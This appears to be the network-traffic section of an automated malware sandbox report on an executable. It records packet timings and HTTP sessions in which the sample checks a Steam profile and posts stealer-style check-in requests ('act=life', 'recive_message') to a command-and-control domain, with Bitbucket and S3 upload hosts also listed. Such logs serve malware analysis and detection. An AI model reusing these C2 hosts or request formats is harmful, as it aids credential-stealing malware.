                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.598150015 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.598170996 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.598180056 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.598206997 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.598220110 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.598242044 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.598304033 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.598313093 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.641025066 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.794878960 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.794895887 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.794922113 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.794935942 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.794956923 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.794970989 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.795001030 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.795027018 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.795028925 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.795042038 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.795087099 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.795336962 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.795366049 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.795375109 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.795387030 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.795418978 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.795439005 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.795448065 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.796667099 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.796685934 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.796715975 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.796772957 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.796786070 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.796798944 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.798161983 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.798190117 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.798266888 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:06.798274040 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.176673889 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.182414055 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.182429075 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.182761908 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.182770014 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.188441992 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.188465118 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.188632011 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.188632011 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.188647032 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.194214106 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.194272995 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.194294930 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.194302082 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.194338083 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.200567007 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.200622082 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.200642109 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.200648069 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.200727940 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.206496000 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.206521988 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.206593037 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.206598997 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.206615925 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.206752062 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.206758022 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.212620020 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.212646008 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.212704897 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.212711096 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.212989092 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.213335991 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.213418961 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.364603043 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.364643097 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.364675999 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.364789963 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.364804983 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.367784023 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.367805958 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.367871046 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.367881060 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.370552063 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.370568991 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.370678902 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.370685101 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.373946905 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.373986006 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.374022961 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.374037027 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.374053001 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.374087095 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.374140024 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.377509117 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.377532005 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.377583027 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.377589941 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.377607107 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.377656937 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.380176067 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.380371094 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.380388975 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.380422115 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.380475044 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.380480051 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.380530119 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.383230925 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.383246899 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.383331060 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.383336067 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.383414984 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.383903980 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.386631966 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.386652946 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.386698961 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.386704922 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.386750937 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.387722969 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.558099985 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.558130026 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.558295965 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.558317900 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.558463097 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.953855991 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.953936100 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.953946114 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.953963995 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.955749035 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.955782890 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.955815077 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.955823898 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.955867052 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.958617926 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.958635092 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.958715916 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.958733082 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.958784103 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.958796024 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.962121010 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.962140083 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.962187052 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.962194920 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.962266922 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.016078949 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.134722948 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.134749889 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.134799004 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.134864092 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.134884119 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.134926081 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.138072014 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.138092995 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.138171911 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.138180017 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.138211966 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.141473055 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.141520023 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.141565084 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.141572952 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.141609907 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.144201994 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.144232035 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.144330025 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.144330025 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.144337893 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.148041964 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.148087025 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.148119926 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.148128986 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.148273945 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.148391962 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.150331974 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.151278019 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.151298046 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.151343107 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.151348114 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.151376009 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.151391029 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.151401043 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.154408932 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.154423952 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.154499054 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.154516935 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.156956911 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.156984091 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.157022953 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.157037973 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.157102108 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.203490019 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.203500986 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.250415087 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.327999115 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.328360081 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.328370094 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.328411102 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.328439951 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.328447104 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.328458071 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.328464985 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.328547001 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.331152916 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.331161022 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.331182003 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.331203938 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.331219912 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.331226110 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.331254005 CET49777443192.168.2.1152.216.152.124
• steamcommunity.com
• lev-tolstoi.com
• bitbucket.org
• bbuseruploads.s3.amazonaws.com

Session ID: 0
Source IP: 192.168.2.11
Source Port: 49709
Destination IP: 23.55.153.106
Destination Port: 443
PID: 7428
Process: C:\Users\user\Desktop\jSFUzuYPG9.exe

Timestamp: 2024-12-23 07:40:38 UTC
Bytes transferred: 219
Direction: OUT
Data:
GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com

Timestamp: 2024-12-23 07:40:39 UTC
Bytes transferred: 1905
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:40:39 GMT
                                                                                                                                                                                                                                                                        Content-Length: 35121
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: sessionid=4790888d927cfbd005b1b466; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                        Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-23 07:40:39 UTC | 14479 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-23 07:40:39 UTC | 10097 | IN | Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-23 07:40:39 UTC | 10545 | IN | Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.11 | 49715 | 104.21.66.86 | 443 | 7428 | C:\Users\user\Desktop\jSFUzuYPG9.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:40:40 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: lev-tolstoi.com
2024-12-23 07:40:40 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-23 07:40:41 UTC | 1119 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 07:40:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=67kv1si64tdjpa0pnv351ep0h1; expires=Fri, 18 Apr 2025 01:27:20 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zGe3QkjrhNi5QhEQxxHLBa9OyHnSfpkmf%2F1Xy0cbTAr8sNmERQQ31NorAB4qOxH3pHEANtRKgBn8NYfbekxoVdMuznE8mUOEDQ08myNSRHDRWqsX6WGoZzHlAJf5nbg8JTo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f66b475e81cc434-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1491&min_rtt=1485&rtt_var=570&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1897335&cwnd=196&unsent_bytes=0&cid=4d9bbba3a6e4adbc&ts=755&x=0"
2024-12-23 07:40:41 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-23 07:40:41 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.11 | 49721 | 104.21.66.86 | 443 | 7428 | C:\Users\user\Desktop\jSFUzuYPG9.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:40:42 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 53
Host: lev-tolstoi.com
2024-12-23 07:40:42 UTC | 53 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
